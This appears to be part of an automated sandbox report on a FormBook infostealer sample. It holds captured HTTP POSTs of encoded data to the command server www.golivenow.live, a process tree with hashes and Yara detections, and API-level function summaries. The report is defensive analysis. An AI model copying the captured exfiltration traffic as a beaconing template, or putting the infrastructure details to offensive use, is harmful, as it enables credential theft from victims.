9	192.168.2.10	49989	66.29.149.46	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:49.721748114 CET	665	OUT	POST /r2k9/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.golivenow.live Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 191 Origin: http://www.golivenow.live Referer: http://www.golivenow.live/r2k9/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 50 65 6e 34 6f 55 7a 58 72 76 4c 4a 6f 50 5a 74 4b 6f 6a 48 71 43 4c 47 42 6c 35 78 Data Ascii: nF=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStPen4oUzXrvLJoPZtKojHqCLGBl5x
Jan 11, 2025 03:50:50.290543079 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:50:50 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49990	66.29.149.46	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:52.429961920 CET	689	OUT	POST /r2k9/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.golivenow.live Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 Origin: http://www.golivenow.live Referer: http://www.golivenow.live/r2k9/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 58 49 50 6a 4d 62 54 6d 6c 73 76 56 32 64 71 42 69 39 4a 61 46 70 6f 38 4a 61 47 41 3d 3d Data Ascii: nF=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51XIPjMbTmlsvV2dqBi9JaFpo8JaGA==
Jan 11, 2025 03:50:52.886940002 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:50:52 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49991	66.29.149.46	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:55.081763983 CET	1702	OUT	POST /r2k9/ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.golivenow.live Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1227 Origin: http://www.golivenow.live Referer: http://www.golivenow.live/r2k9/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 6e 46 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 56 38 54 6f 4b 4a 55 57 6a 38 5a 33 6e 48 66 6e 75 35 74 58 67 58 4b 42 64 33 2f 78 43 36 63 71 4e 4b 67 71 49 39 6e 50 35 43 6d 74 33 62 53 41 6c 45 45 63 43 78 55 77 57 2f 50 72 54 43 57 4b 62 34 68 75 66 39 66 66 6d 69 51 47 5a 4d 73 57 48 50 51 6a 56 44 34 32 78 6f 64 43 43 58 35 4d 46 46 7a 6d 4f 49 52 43 57 48 56 44 63 58 31 75 67 39 48 37 4a 45 49 31 61 71 64 73 32 74 2b 2b 66 75 57 77 76 33 72 78 64 6e 5a 70 33 6a 5a 65 41 73 50 53 47 67 32 76 4a 4d 73 44 51 59 6e 54 7a 47 56 5a 70 57 39 52 4e 49 30 74 6b 50 59 35 42 71 44 6d 61 62 38 69 79 6d 51 37 68 6c 50 67 55 37 52 30 59 33 [TRUNCATED] Data Ascii: nF=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubV8ToKJUWj8Z3nHfnu5tXgXKBd3/xC6cqNKgqI9nP5Cmt3bSAlEEcCxUwW/PrTCWKb4huf9ffmiQGZMsWHPQjVD42xodCCX5MFFzmOIRCWHVDcX1ug9H7JEI1aqds2t++fuWwv3rxdnZp3jZeAsPSGg2vJMsDQYnTzGVZpW9RNI0tkPY5BqDmab8iymQ7hlPgU7R0Y3MW2DrsUOu+vlQ8YhNLlgXE0DnqScyH8j00D1jbtRzHdhaxooalbryYeznwMnOBNB7WikA2Ux5caXWTbhBnHUGoldGfR1PnqbMiXiKa8C3bFvTQd8gTwYoMBXPHQjVrI/lnY800bU86vqLB4dCLzIvIB4B1u+JNmSJgpWR/7z7mISzhc7co/QvmWMpC70Ni8FT3QH8eiA+5EbftFBvTEO5eyCsGKLo34ML0zV55BtL+DCqOpMjqL1mrEaXg34ShA/1RZWoZgkk4aNR7NJAaS0GFJI/voek9iOuMtCmQPRRikTbY+b9JExRWu2rO9VH5JHz0Eyh2xJQsBBWNj4f47j0OTywuXstqUhlMrYx7UJUbAs/4ESt3v7L6eufDFS6z8JqNbxTsyubaG+shpUh6NCLdWaVDszkLzXanLqpyg9Hf/JknM9qRJgUdhcJh4rqavOlkyCcHvvHdk29DHuXsUYmS72q+GxWmzjZjXkhnn0FZux3m4YsUfDav6Q+mzFp6bGs4FxPmOVkXIN6l8+boVNO87Nh5uNaXsLruu0K5bpQ0dmq0rAuQz16V8TBNLf2KUYXdTKlk6wtp9AMwAMk6z/OmUbdyEfQHX8WIXAXllDkiibrlzQgpm21cRLL8WweVSG/8FiGW2S2oZkglKJxxZzHPTl1bJ+4n/y56 [TRUNCATED]
Jan 11, 2025 03:50:55.620913029 CET	637	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:50:55 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49992	66.29.149.46	80	764	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:50:57.631330967 CET	404	OUT	GET /r2k9/?nF=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z7XbG+3k9TZnvIg3pQBIzBI2XOfShgg==&JHJt=itqtMr9H_JJ83L HTTP/1.1 Accept: / Accept-Language: en-US,en;q=0.9 Host: www.golivenow.live Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Jan 11, 2025 03:50:58.219391108 CET	652	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:50:58 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Target ID:	0
Start time:	21:48:55
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\zAg7xx1vKI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zAg7xx1vKI.exe"
Imagebase:	0x620000
File size:	962'560 bytes
MD5 hash:	F8C4859851A35DC60C365F9BCDD876EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:48:58
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\zAg7xx1vKI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zAg7xx1vKI.exe"
Imagebase:	0x470000
File size:	962'560 bytes
MD5 hash:	F8C4859851A35DC60C365F9BCDD876EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1882088297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1882756009.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1883972868.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:49:45
Start date:	10/01/2025
Path:	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe"
Imagebase:	0xb60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2556015245.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	21:49:47
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cacls.exe"
Imagebase:	0x900000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2554149849.0000000002910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2554298777.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	21:50:00
Start date:	10/01/2025
Path:	C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe"
Imagebase:	0xb60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2555827665.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	21:50:13
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	91
Total number of Limit Nodes:	6

Executed Functions

Function 00E6D5B9 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E6D646
GetCurrentThread.KERNEL32 ref: 00E6D683
GetCurrentProcess.KERNEL32 ref: 00E6D6C0
GetCurrentThreadId.KERNEL32 ref: 00E6D719

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a25e75c4c47b1f8dc0af6a561d6b7bcbe87e17e2492e6c358bd3e550d0ea111c
Instruction ID: e75259074f8d9f9a9f08654beee50418d4d871b0099c968cd103bcf793c3bfa4
Opcode Fuzzy Hash: a25e75c4c47b1f8dc0af6a561d6b7bcbe87e17e2492e6c358bd3e550d0ea111c
Instruction Fuzzy Hash: F65167B0E043098FDB14CFA9E948BEEBBF1EF88304F248459E019A7250DB749945CB65

Function 00E6D5C8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E6D646
GetCurrentThread.KERNEL32 ref: 00E6D683
GetCurrentProcess.KERNEL32 ref: 00E6D6C0
GetCurrentThreadId.KERNEL32 ref: 00E6D719

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6c028f1aec4c1f2667925555e3368284684691b56d58f1add13ff46cea29211a
Instruction ID: 77a0508d789af7c0164d210240d8a15dfe61d60fe78ed30e7315aead314607b9
Opcode Fuzzy Hash: 6c028f1aec4c1f2667925555e3368284684691b56d58f1add13ff46cea29211a
Instruction Fuzzy Hash: 4E5148B0E043098FDB14CFAAE948B9EBBF1EF88304F248459E419A7250DB749944CB65

Function 06F1E2AC Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F1E4EE

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 01cc25371c224f44c687d71c8e708d26fb6168aa1dfc104232d12d00cba46eb2
Instruction ID: 3a812d0f829a65ee783d874834c41d0f06417a393f2d9ab7e19e48a7bc61b4cb
Opcode Fuzzy Hash: 01cc25371c224f44c687d71c8e708d26fb6168aa1dfc104232d12d00cba46eb2
Instruction Fuzzy Hash: FBA18C71D003199FEF64CFA8C841BEDBBB2BF48310F148569E809AB290DB749985CF91

Function 06F1E2B8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F1E4EE

Memory Dump Source

Source File: 00000000.00000002.1343857622.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_zAg7xx1vKI.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4fd938cf27f962c44b77bddb0b132fdc7876b8e27a82be1d3a235d61126f4ff8
Instruction ID: 8a1375502f9efb9cae5833932ff7ce2cd25721b2ccd652b064d1f7765b7dd944
Opcode Fuzzy Hash: 4fd938cf27f962c44b77bddb0b132fdc7876b8e27a82be1d3a235d61126f4ff8
Instruction Fuzzy Hash: A9916A71D003198FEF64CFA9C841BEDBBB2BF48350F148569E809AB290DB759985CF91

Function 00E6AF19 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E6B17E

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3a058ed57bae997765f9fecd9cae8d96dd3e0147a0c6402dda425b680112b58c
Instruction ID: bcc950a657fe95b0609ad87c2cff465118a142fb90adc5b4e323efcf88edef67
Opcode Fuzzy Hash: 3a058ed57bae997765f9fecd9cae8d96dd3e0147a0c6402dda425b680112b58c
Instruction Fuzzy Hash: DD816670A00B458FD724CF29D0517AABBF1FF88344F04892AE49AE7A50DB35E849CF91

Function 00E6590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E659C9

Memory Dump Source

Source File: 00000000.00000002.1339389551.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_zAg7xx1vKI.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9dfcd61e4bece6d983ecb5efe95448bd16ee445ad2655aa58f036e2ad4da8f55
Instruction ID: 51354f3d562348014f557844ccc04c0a9506ba04b33a90212b2aec6cea9d450d
Opcode Fuzzy Hash: 9dfcd61e4bece6d983ecb5efe95448bd16ee445ad2655aa58f036e2ad4da8f55
